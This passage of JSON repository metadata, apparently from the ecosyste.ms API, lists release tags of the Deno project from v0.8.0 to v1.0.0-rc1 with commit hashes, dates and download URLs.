0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_